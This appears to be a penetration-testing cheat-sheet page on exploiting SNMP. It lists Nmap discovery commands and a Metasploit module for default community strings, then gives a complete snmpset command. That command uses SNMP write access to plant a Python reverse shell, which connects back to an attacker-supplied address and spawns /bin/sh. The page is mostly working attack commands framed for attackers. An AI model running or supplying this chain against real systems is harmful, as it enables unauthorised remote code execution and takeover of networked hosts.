Simple Network Management Protocol (SNMP)
The SNMP protocol provides a way for devices on a network to share information with one another. As an attacker, we can sometimes leverage a misconfigured SNMP service to obtain detailed information about the system and/or execute arbitrary code.
Exploitation
Identifying SNMP on a Network
# Identify SNMP utilizing Nmap
nmap -sU -p161 $hosts
# Identify SNMP and retrieve server type / operating system with Nmap
nmap -sU -p161 $hosts --script=snmp-sysdescr
Identifying Default Community Strings
# Identify Default Community Strings with Metasploit
auxiliary/scanner/snmp/snmp_login
Exploiting SNMP with Write Access
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $targetip \
'nsExtendStatus."evil"' = createAndGo \
'nsExtendCommand."evil"' = /usr/bin/python \
'nsExtendArgs."evil"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$ip\",$port));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
References
Last updated